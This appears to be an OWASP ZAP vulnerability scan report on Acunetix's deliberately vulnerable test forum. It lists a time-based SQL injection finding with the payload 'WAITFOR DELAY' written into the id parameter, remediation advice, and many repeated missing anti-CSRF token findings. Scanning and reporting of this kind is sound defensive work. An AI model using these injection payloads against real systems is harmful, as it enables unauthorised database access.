| Evidence | |
| Request Header - size: 391 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 14 bytes. |
HTTP/1.0 0
|
| Response Body - size: 0 bytes. |
|
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | id |
| Attack | 40 WAITFOR DELAY '0:0:15' -- |
| Evidence | |
| Request Header - size: 444 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 14 bytes. |
HTTP/1.0 0
|
| Response Body - size: 0 bytes. |
|
| Instances | 4 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40027 |
|
Medium |
Absence of Anti-CSRF Tokens |
|---|---|
| Description |
No Anti-CSRF tokens were found in a HTML submission form.
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
